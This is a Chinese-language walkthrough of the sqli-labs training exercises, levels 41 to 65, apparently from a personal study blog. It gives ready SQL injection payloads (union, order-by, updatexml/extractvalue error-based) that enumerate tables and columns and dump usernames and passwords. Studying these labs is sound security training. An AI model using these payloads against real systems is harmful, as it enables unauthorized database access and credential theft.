sqli-labs 41-65关

##41关
联合注入，没有闭合。

?id=0 union select 1,database(),3--+

##42关
这一关，经过尝试发现，密码没有被过滤。
然后在密码那里进行联合注入。

0' union select 1,group_concat(username,0x3a,password),3 from users#

账号随意。

##43关
见42关，这两关的区别只是闭合方式不同。这关是')闭合。
##44关
这关和42关一样，只是这关没有错误回显。
##45关。
这关和43关一样。
##46关 order by 排序。
https://www.cnblogs.com/-qing-/p/11610385.html#_labelTop
看这位大佬的博客，对于，order by联合注入，我们先进行。

?sort=1+

通过asc 和desc查看返回数据是否相同来简单判断是否存在order by注入

http://sqli-qing.cn/sqli/Less-46/?sort=1+asc
http://sqli-qing.cn/sqli/Less-46/?sort=1+desc

sort()函数，进行排序。

发现可以。这是一种方法。
可以尝试，报错注入。?sort=1 and(updatexml(1,concat(0x7e,(select database())),0));

报错注入，具体可以看我前面的博客。我在这里就不在详细述说了。
##47关order by 子句-单引号-错误
见46关，单引号闭合。
##48关
见46关，不过这关要用盲注。
我使用时间盲注。时间盲注我前面写的也有。
49,50,51,52,53.这几关基本上都是，order by排序。差别不大。不再细说
##54关，
直接联合注入，
这一关没什么特别 特别在于查询的次数 key下面那段就是为了控制查询次数 随便表名列名

?id=-1%27%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27challenges%27--+

##55关
同54关，基于小括号。
##56关
同 Less 54。基于小括号_单引号
##57关
同 Less 54。基于 _双引号_字符型
##58关
手工报错型注入
注意id=正确值
爆表payload

?id=1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) --+

下面的代码使用时需要，改一下表名。因为这关的表名，数据库名，还用字段名是随机生成的。下面关也一样。
爆列名（字段）payload

?id=1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'))) --+

这个时候可能未能完全显示。
使用 and column_name not in (‘user_id’,‘first_name’,‘last_name’,‘user’,‘avatar’,‘last_login’,‘failed_login’) 来显示其他值：

?id=1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' and column_name not in ('user_id','first_name','last_name','user','avatar','last_login','failed_login')))) --+

爆值payload

?id=1' and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users)))--+

使用not in显示其他值。

?id=1' and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users where username not in ('Dumb','I-kill-you'))))--+

前面没说这种方法，既然遇见这个题了说一下。这种注入方法。详情见这位大佬博客。
https://blog.youkuaiyun.com/zpy1998zpy/article/details/80631036
##59关
无闭合方式。方法见58关。
##60关
见58关
##61关
见58关，闭合方式不同。

?id=1')) and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) --+

##62关，
这关联合注入和报错注入都不行，盲注。
##63关
##64关
##65关
同62关闭合方式不同。